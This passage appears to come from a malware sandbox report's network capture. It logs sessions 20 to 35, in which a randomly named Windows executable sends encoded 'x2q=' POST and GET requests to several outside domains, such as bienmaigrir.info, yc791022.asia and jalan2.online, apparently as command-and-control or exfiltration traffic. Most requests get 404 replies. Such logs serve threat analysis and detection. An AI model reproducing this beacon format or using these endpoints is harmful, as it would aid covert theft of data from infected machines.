                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.070002018.xyz
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.070002018.xyz/6m2n/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:41.539211988 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:41 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: W/"66cce1df-b96"
                                                                      Content-Encoding: gzip
                                                                      Dec 10, 2024 15:16:41.539259911 CET | 370 | IN


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.11 | 49732 | 161.97.142.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:42.979713917 CET | 359 | OUT | GET /6m2n/?x2q=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0/9t4uQ02LXci5FVUlLJ03efKQM1irr8PMPM=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:44.212985992 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:44 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 2966
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: "66cce1df-b96"
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                      Dec 10, 2024 15:16:44.213069916 CET | 1236 | IN
                                                                      Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                      Dec 10, 2024 15:16:44.213083029 CET | 698 | IN
                                                                      Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.11 | 49733 | 35.220.176.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:52.620763063 CET | 632 | OUT | POST /7yhf/ HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bienmaigrir.info
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bienmaigrir.info/7yhf/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:54.026968956 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      22 | 192.168.2.11 | 49734 | 35.220.176.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:55.379549026 CET | 652 | OUT | POST /7yhf/ HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bienmaigrir.info
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bienmaigrir.info/7yhf/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHBneQOcmEsQNeD9hkpm4epTGjMkbh7fwnsOKw/eVCTYiv4YeW9hmKB88NqUNqTJyYigfsv5xl2+jwK+gXh0Lh5psPZ5Sce0ztTALJfhOp8QlQp28Vu/SYqH6xZmNYRA4fQ9nAW6OedDvl/Wr0IMK0G0NIBgaTH3McylwgZI9crrp7k=
                                                                      Dec 10, 2024 15:16:56.791238070 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      23 | 192.168.2.11 | 49735 | 35.220.176.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:58.065290928 CET | 1665 | OUT | POST /7yhf/ HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bienmaigrir.info
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bienmaigrir.info/7yhf/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q= [TRUNCATED]
                                                                      Dec 10, 2024 15:16:59.536801100 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:59 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      24 | 192.168.2.11 | 49736 | 35.220.176.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:00.723587036 CET | 362 | OUT | GET /7yhf/?x2q=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGr5qIxSDZKvplZ+L2zC6/y242QbNTV2zLWhg0=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:02.208415031 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:17:01 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      25 | 192.168.2.11 | 49737 | 101.35.209.183 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:08.395220995 CET | 623 | OUT | POST /wu7k/ HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.yc791022.asia
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yc791022.asia/wu7k/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=ruscVq1iLK4KJWZs14mow7Y0oAkCLqWU8g1rpXt+uHwyVIchFi1VkbTv0rkzfjjwOBVBRgZi//pXSO4+eLsxxZD1glWMxXF9ka1GBlUaY4q5AThCrAehwaaPuuB/Mgpg6LcYE8VsRuQI6pLLIVR9uLSYJ6A60BoeI8A/ptD0cB5iPnW9Vpz3Mb+DM2eASvH7AA==
                                                                      Dec 10, 2024 15:17:09.950735092 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:09 GMT
                                                                      Server: Apache
                                                                      Content-Length: 263
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      26 | 192.168.2.11 | 49738 | 101.35.209.183 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:11.061856031 CET | 643 | OUT | POST /wu7k/ HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.yc791022.asia
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yc791022.asia/wu7k/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSgyVoMhDXBVp7Tv8LkrRDj3OBY8Rhli//9XSK0+f40wxJDz+FWO/3F9ka1GBh1PY5C5ACRCkEqi56aMpuB/Igp86Lc6E5oxRsYI6o7LLHp69rTTWqBzljtABuROtLP4TidhKhbnFK6gPI2BYQ/wbeiybAjbHhlUYgJAA5J6bYgmBMA=
                                                                      Dec 10, 2024 15:17:12.526433945 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:12 GMT
                                                                      Server: Apache
                                                                      Content-Length: 263
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      27 | 192.168.2.11 | 49739 | 101.35.209.183 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:13.729052067 CET | 1656 | OUT | POST /wu7k/ HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.yc791022.asia
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yc791022.asia/wu7k/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q= [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      28 | 192.168.2.11 | 49740 | 101.35.209.183 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:16.382314920 CET | 359 | OUT | GET /wu7k/?x2q=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVPv+PT22eq81M1kOVVHAZEZoSUQiJLk0TbwLs=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:17.873094082 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:17 GMT
                                                                      Server: Apache
                                                                      Content-Length: 263
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      29 | 192.168.2.11 | 49741 | 108.181.189.7 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:23.357057095 CET | 623 | OUT | POST /ykgd/ HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.jalan2.online
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jalan2.online/ykgd/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=wqjgxK/3qMsOjPmuQIwhaH/lcsM5OP5DVbeD+pXNCcFEosVQNZYzYColzusZ33mf+tdKi8297KJWxhjjdhwB6fnPXtnm91sIrt4APmuysF0WPa6xqLx5s2b0d2t95JTkMpLA9vTdoA/otP3sHGzjo0PrRS1XVlDk3sYwakLILhVIfP7OxTHnAbaf1oh36oAorw==
                                                                      Dec 10, 2024 15:17:24.658584118 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      date: Tue, 10 Dec 2024 14:17:24 GMT
                                                                      server: LiteSpeed
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      transfer-encoding: chunked
                                                                      connection: close
                                                                      Dec 10, 2024 15:17:24.658595085 CET | 713 | IN |


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      30 | 192.168.2.11 | 49742 | 108.181.189.7 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:26.035084009 CET | 643 | OUT | POST /ykgd/ HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.jalan2.online
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jalan2.online/ykgd/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOREmoRQMdszbCol7Osc6XmE+tR4i9697KNWxgTjdSoO4PnBPdnkiFsIrt4APm76sBYWPpixqud6hWb3M2t9o5StMpLy9raKoDXotPHse3zgm0PxVS0ebVqdvtt8CVH0CDctXp2UhwOwDISdhOAHzZlhw177RUj9JkjDCN7KSiRMI6A=
                                                                      Dec 10, 2024 15:17:27.261723995 CET | 992 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      date: Tue, 10 Dec 2024 14:17:27 GMT
                                                                      server: LiteSpeed
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      transfer-encoding: chunked
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      31 | 192.168.2.11 | 49743 | 108.181.189.7 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:28.697606087 CET | 1656 | OUT | POST /ykgd/ HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.jalan2.online
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jalan2.online/ykgd/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q= [TRUNCATED]
                                                                      Dec 10, 2024 15:17:29.923934937 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      date: Tue, 10 Dec 2024 14:17:29 GMT
                                                                      server: LiteSpeed
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      transfer-encoding: chunked
                                                                      connection: close
                                                                      Dec 10, 2024 15:17:29.924335003 CET | 713 | IN |


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      32 | 192.168.2.11 | 49744 | 108.181.189.7 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:31.354883909 CET | 359 | OUT | GET /ykgd/?x2q=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/h7/Kfsz1ox4b0pkaI3y+ymEAIYvakOAEmGE=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:32.559376955 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      content-length: 1249
                                                                      date: Tue, 10 Dec 2024 14:17:32 GMT
                                                                      server: LiteSpeed
                                                                      connection: close
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                                      Dec 10, 2024 15:17:32.559417963 CET | 224 | IN |
                                                                      Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      33 | 192.168.2.11 | 49745 | 209.74.77.107 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:38.277431965 CET | 638 | OUT | POST /fbpt/ HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.beyondfitness.live
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.beyondfitness.live/fbpt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=hF42VS9OEqvX3julElbxkE80MbdvLBeyK0juN8r0Tv6un4uXhSOSi9mZZ8bbOaj2Bu8aMOVxXFVKXXU4Nn+h5kshvo3fqpVLCn1huoUP4XyJSweunJ4EC4UWiZu5VpxM4joLfozFK0gO8lpX1B7IzpNw/fdn5/H2hKNT8+HX84w6a6uF1GZ1kwu1FG09rYqhdA==
                                                                      Dec 10, 2024 15:17:39.482867956 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:39 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      34 | 192.168.2.11 | 49746 | 209.74.77.107 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:40.950670958 CET | 658 | OUT | POST /fbpt/ HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.beyondfitness.live
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.beyondfitness.live/fbpt/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTdOunY+XgTOSl9mZWcbaKajDBuwSML9xXExKXV84OQKurksjjI3R15VLCn1huoAh4XqJSBuulo4HLYUX1pu5G5xI4jpufr3vK2IO8kZXwA7X6pN6y/c39uyuiq8Jy8Tfr7smScjfllQinjm3RgVNipPoGGhus2rtfE2nXJaFTS5NdC8=
                                                                      Dec 10, 2024 15:17:42.181890965 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:41 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      35 | 192.168.2.11 | 49747 | 209.74.77.107 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:17:43.623826981 CET | 1671 | OUT | POST /fbpt/ HTTP/1.1
                                                                      Host: www.beyondfitness.live
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.beyondfitness.live
